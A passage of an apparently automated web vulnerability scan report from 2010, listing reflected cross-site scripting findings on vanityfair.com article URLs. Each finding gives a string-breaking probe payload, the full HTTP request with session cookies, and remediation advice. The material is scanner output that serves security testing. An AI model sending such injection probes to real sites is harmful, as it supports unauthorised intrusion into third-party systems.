The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3f6b'%3bdc25988505f was submitted in the REST URL parameter 3. This input was echoed as b3f6b';dc25988505f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010b3f6b'%3bdc25988505f/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:30 GMT
Date: Mon, 29 Nov 2010 16:49:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010b3f6b';dc25988505f/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that
...[SNIP]...

1.220. http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44661'%3be4d4dd436e2 was submitted in the REST URL parameter 4. This input was echoed as 44661';e4d4dd436e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/1144661'%3be4d4dd436e2/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:44 GMT
Date: Mon, 29 Nov 2010 16:49:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/1144661';e4d4dd436e2/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dri
...[SNIP]...

1.221. http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ee7'%3b32bded5e107 was submitted in the REST URL parameter 5. This input was echoed as 12ee7';32bded5e107 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html12ee7'%3b32bded5e107 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:00 GMT
Date: Mon, 29 Nov 2010 16:50:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
t type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html12ee7';32bded5e107',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.222. http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6172a'%3baefc0af122a was submitted in the REST URL parameter 3. This input was echoed as 6172a';aefc0af122a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/20106172a'%3baefc0af122a/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:23 GMT
Date: Mon, 29 Nov 2010 16:49:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/20106172a';aefc0af122a/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity
...[SNIP]...

1.223. http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba74'%3bb4cd8dd4a4d was submitted in the REST URL parameter 4. This input was echoed as 8ba74';b4cd8dd4a4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/118ba74'%3bb4cd8dd4a4d/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:38 GMT
Date: Mon, 29 Nov 2010 16:49:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/118ba74';b4cd8dd4a4d/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fa
...[SNIP]...

1.224. http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 126e1'%3bac9d2566df4 was submitted in the REST URL parameter 5. This input was echoed as 126e1';ac9d2566df4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html126e1'%3bac9d2566df4 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:54 GMT
Date: Mon, 29 Nov 2010 16:49:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
g.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html126e1';ac9d2566df4',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.225. http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3617'%3b4a12938d0f3 was submitted in the REST URL parameter 3. This input was echoed as e3617';4a12938d0f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010e3617'%3b4a12938d0f3/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:21 GMT
Date: Mon, 29 Nov 2010 16:49:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010e3617';4a12938d0f3/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural cataly
...[SNIP]...

1.226. http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57b41'%3b2b03a642172 was submitted in the REST URL parameter 4. This input was echoed as 57b41';2b03a642172 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/1157b41'%3b2b03a642172/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:37 GMT
Date: Mon, 29 Nov 2010 16:49:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/1157b41';2b03a642172/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst
...[SNIP]...

1.227. http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e3cc'%3b41370df9c79 was submitted in the REST URL parameter 5. This input was echoed as 6e3cc';41370df9c79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html6e3cc'%3b41370df9c79 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:49 GMT
Date: Mon, 29 Nov 2010 16:49:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html6e3cc';41370df9c79',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.228. http://www.vanityfair.com/online/oscars/25-questions [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/25-questions

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfe08'%3b82759add385 was submitted in the REST URL parameter 3. This input was echoed as cfe08';82759add385 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/25-questionscfe08'%3b82759add385 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:34 GMT
Date: Mon, 29 Nov 2010 16:49:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/25-questionscfe08';82759add385',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.229. http://www.vanityfair.com/online/oscars/boardwalk-empire/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
